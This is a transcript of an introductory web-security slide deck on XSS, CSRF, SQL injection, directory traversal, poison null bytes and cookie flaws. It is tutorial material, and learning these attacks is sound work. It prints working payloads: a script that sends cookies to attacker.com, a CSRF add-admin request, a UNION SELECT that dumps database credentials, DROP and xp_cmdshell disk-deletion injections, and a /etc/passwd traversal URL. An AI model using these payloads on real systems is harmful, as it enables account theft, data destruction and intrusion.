Comp Foo pt 7: Web Security - PowerPoint PPT Presentation

1 / 24
About This Presentation
Title:

Comp Foo pt 7: Web Security

Description:

When you request a directory from a web server, it first looks for an ... an 'undocumented feature' which allows VBScript execution in the middle of strings. ... – PowerPoint PPT presentation

Number of Views:48
Avg rating:3.0/5.0
Slides: 25
Provided by: x10sec
Category:
Tags: comp | foo | security | vbscript | web

less

Transcript and Presenter's Notes

Title: Comp Foo pt 7: Web Security


1
Comp Foo pt 7 Web Security
  • Directory browsing
  • XSS CSRF
  • SQL injection
  • Directory traversal
  • Mistaken assumptions
  • Poison null byte
  • Cookie security

2
Directory Browsing
  • When you request a directory from a web server,
    it first looks for an index page to return. If
    it's not found, it then checks the server
    configuration to see if it should show a listing
    of all the files in the directory.
  • This can be very, very useful to an attacker and
    may even constitute a vulnerability in itself.

3
Directory BrowsingDefense
  • To disable this feature, simply place a file
    named .htaccess in the directory you want to
    affect and place the following in it
  • Options -Indexes

4
OR
  • If you're the type of person who likes to do such
    things, you could instead enable it in a
    particular directory by using
  • Options Indexes

5
XSS and CSRF
  • XSS and CSRF stand for cross-site scripting and
    cross-site request forgery, respectively.
  • Why not CSS? Well, because that was taken.
  • So what are they?

6
XSS and CSRF
  • They are attacks which involve executing
    scripting in the browsers of other users. The
    difference between them lies simply in the
    exploitation.
  • Cross site scripting involves the stealing of
    data, usually cookies, and cross site request
    forgery involves forcing a user to submit an http
    request.

7
Cross site scripting
  • A common way to launch an XSS attack is to insert
    some sort of scripting into a webpage (such as
    writing it into an entry into a guestbook which
    doesn't check for scripting) which sends the
    cookie as part of a GET request to a logging
    script on a remote server.Example
  • ltscriptgt
  • document.locationhttp//www.attacker.com/cookiel
    ogger.php?cookiedocument.cookie
  • lt/scriptgt

8
Cross site request forgery
  • The same is true for CSRF.
  • Example
  • ltscriptgt
  • document.locationadmin/addadmin.php?id134
  • lt/scriptgt

9
Cross site scripting filters
  • Often, cross site scripting filters are possible
    to bypass by crafting the code specially. For
    instance, if a filter only blocks single quotes,
    one could define a regex and then use its source
    property to return a string, without quotes.
  • Example
  • ltscriptgta/hooray/alert(a.source)lt/scriptgt
  • Google the XSS cheat sheet to see a huge number
    of ways to bypass various filters.

10
SQL Injection
  • SQL injection flaws involve changing the nature
    of an SQL query by crafting special input to be
    placed in that query.
  • Earlier, I gave the example of
  • ' or '''
  • to bypass WHERE clauses.
  • Let's take a look at some other interesting
    injection strings.

11
UNION SELECT
  • The UNION SELECT operator combines two queries
    and returns results as if they were from one
    query. The two queries must have the same number
    of columns requested, with the same types of data
    for each column.
  • Consider the following SQL querySELECT title,
    text FROM articles WHERE idltidgt
  • (ltidgt is replaced by user input)

12
UNION SELECT
  • Consider if ltidgt was
  • -1 UNION SELECT user, pass FROM mysql.users
  • That would make the query look like this
  • SELECT text, title FROM articles WHERE id-1
    UNION SELECT user, pass FROM mysql.users
  • Which would likely not return any articles, and
    in their place would be the usernames and hashed
    passwords of the users for the database.

13
Multiple statements
  • Consider this injection string, if you
    will.3DROP articles
  • making the query look like
  • SELECT title, text FROM articles WHERE id3DROP
    articles

14
Commenting
  • In many database systems, -- and have special
    meaning. They are comment delimiters, like //.
  • So, consider the following query
  • SELECT user, pass FROM users WHERE user'ltusergt'
    AND pass'lthashed passgt'
  • Our old injection string,
  • ' or '''
  • will not work, since it will be hashed and will
    then consist of hex characters, so we cannot
    nullify that WHERE clause.

15
Commenting
  • But what if we entered
  • ' or ''''--as the username, and a junk
    password?
  • SELECT user, pass FROM users WHERE user'' or
    ''''--' AND pass'md5(junkpassword)'
  • Everything after the double dash is ignored.

16
Microsoft SQL Server stored procedures
  • Microsoft SQL Server has some pretty interesting
    stored procedures. One, xp_cmdshell, will execute
    a specified command from a query.
  • So, if we go back to our article query, this
    injection string would be interesting.
  • 3EXEC master..xp_cmdshell 'del C\. /f /s /q'

17
Microsoft Jet DB
  • An interesting thing to note is that Microsoft
    Jet DB has what Microsoft calls an undocumented
    feature which allows VBScript execution in the
    middle of strings.
  • All you need to do is specify a command to be
    executed between pipe characters.

18
Directory Traversal
  • Directory traversal is crafting input in order to
    use resources outside the intended directory,
    usually with elevated privileges.
  • Example
  • http//www.victim.com/viewfile.cgi?file../../../.
    ./../../../../etc/passwd

19
Mistaken assumptions
  • If you have a picture rating site and expect
    people to only be able to vote from 1-5 because
    that's what's in the user interface, you'll be
    awful surprised when someone votes 23.
  • This is just one possibility.

20
Poison NULL byte
  • This has to do with the way that different tiers
    or a multi-tiered application handle null bytes.
  • Take for example a perl script running on a web
    server which serves the contents of files
    specified by a variable. It checks to see that
    the string ends in .html, and then it opens the
    file.
  • Perl does not use null bytes as string
    delimiters, so admin.pl00.html matches. However,
    the operating system interprets the null byte as
    a delimiter when it is called upon to open the
    file, and it returns the contents of admin.pl.

21
Poison NULL byte
  • An example of a similar flaw can be found in a
    script which checks an img tag's src attribute to
    make sure it ends in .jpg, .gif, or .png.
  • Similar to the usage of the NULL byte, we can
    place a pound sign before the .jpg and have
    ourselves a nice little CSRF attack.
  • Example /admin/admin.pl?actionaddadminid3.jpg

22
Cookie security
  • The thing to remember about cookies is that they
    are client side. They are also delicious.
  • But mostly, client side.

23
Choco choco chip
  • Cookies can be modified, and read. Occasionally,
    as we know, they can be stolen. As such, you
    should avoid using non-session cookies to verify
    a login, and you should have the sessions expire
    after a reasonable amount of time.

24
Oatmeal raisin
  • I have seen, and it is sad but true, a cookie
    labeled admin0 on a few websites.
  • Yeah, guess what happened after that?
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2025 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "Comp Foo pt 7: Web Security" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!